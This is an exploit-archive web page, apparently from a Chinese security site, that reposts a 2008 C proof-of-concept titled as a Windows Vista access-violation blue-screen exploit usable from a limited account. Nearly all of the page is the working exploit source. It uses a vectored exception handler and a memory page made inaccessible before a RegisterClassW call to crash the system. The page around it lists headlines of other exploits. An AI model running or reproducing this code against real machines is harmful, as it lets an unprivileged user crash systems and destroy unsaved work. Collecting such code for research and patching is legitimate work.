首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MS Windows Vista Access Violation from Limited Account Exploit (BSoD) 来源：www.vfcocus.net 作者：Defsanguje 发布时间：2008-10-06   // ////////////////////////////////////////////////////////////// // Windows Vista BSoD (Access violation) from limited account. // // Tested on Home Premium & Ultimate @ October 05 2008         // ///////////////////////////////////////////////////////////////// #include <stdio.h> #include <windows.h> WCHAR szClass[] = L"BSODClass"; int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo); typedef void (WINAPI* pFunc)(ULONG ulFirst, LPVOID lpHandler); pFunc pRtlAddVectoredExceptionHandler; typedef struct {     DWORD dwWriteViolation;     LPVOID lpAddress; } EXCEPTION_ACCESS_VIOLATION_PARAMS; int main() {     WNDCLASSW wc;     DWORD dwOldProt;     printf("Windows Vista BSoD from usermode/limited account.\n"            "Coded by. Defsanguje - October 05 2008\n");     // Setup vectored exception handler. SEH would work also.     pRtlAddVectoredExceptionHandler = (pFunc)GetProcAddress((HMODULE)GetModuleHandle("ntdll.dll"),                                                             "RtlAddVectoredExceptionHandler");     (*pRtlAddVectoredExceptionHandler)(TRUE, ExceptionHandler);     // Dummy data     wc.style         = 0;     wc.lpfnWndProc   = NULL;     wc.cbClsExtra    = 0;     wc.cbWndExtra    = 0;     wc.hInstance     = GetModuleHandle(NULL);     wc.hIcon         = NULL;     wc.hCursor       = LoadCursor(NULL, IDC_ARROW);     wc.hbrBackground = GetStockObject(HOLLOW_BRUSH);     wc.lpszMenuName  = NULL;     wc.lpszClassName = szClass;     VirtualProtect(szClass, 1, PAGE_NOACCESS, &dwOldProt);     RegisterClassW(&wc);     printf("You shouldn't see this");     return 0; } int ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo) {     static LPVOID lpLastAddress;     static DWORD dwOldProt;     EXCEPTION_ACCESS_VIOLATION_PARAMS* avParams;     switch(lpExceptionInfo->ExceptionRecord->ExceptionCode)     {         case EXCEPTION_ACCESS_VIOLATION:             avParams = (EXCEPTION_ACCESS_VIOLATION_PARAMS*)lpExceptionInfo->ExceptionRecord->ExceptionInformation;             VirtualProtect(avParams->lpAddress, 1, PAGE_READWRITE, &dwOldProt);             lpLastAddress = avParams->lpAddress;             // Set trap flag             lpExceptionInfo->ContextRecord->EFlags |= 0x100;             break;         case STATUS_SINGLE_STEP:             VirtualProtect(lpLastAddress, 1, PAGE_NOACCESS, &dwOldProt);             break;         default:             break;     }     return EXCEPTION_CONTINUE_EXECUTION; ; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·FOSS Gallery Admin <= 1.0 Remo ·AyeView 2.20 (invalid bitmap h ·mIRC 6.34 Remote Buffer Overfl ·FastStone Image Viewer 3.6 (ma ·AdaptCMS Lite <= 1.3 Blind SQL ·FOSS Gallery Public <= 1.0 Arb ·Serv-U 7.2.0.1 Remote FTP File ·Galerie 3.2 (pic) WBB Lite Add ·Serv-U 7.2.0.1 (stou con:1) De ·geccBBlite 2.0 (leggi.php id) ·IP Reg <= 0.4 Remote Blind SQL ·OpenX 2.6 (ac.php bannerid) Re   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved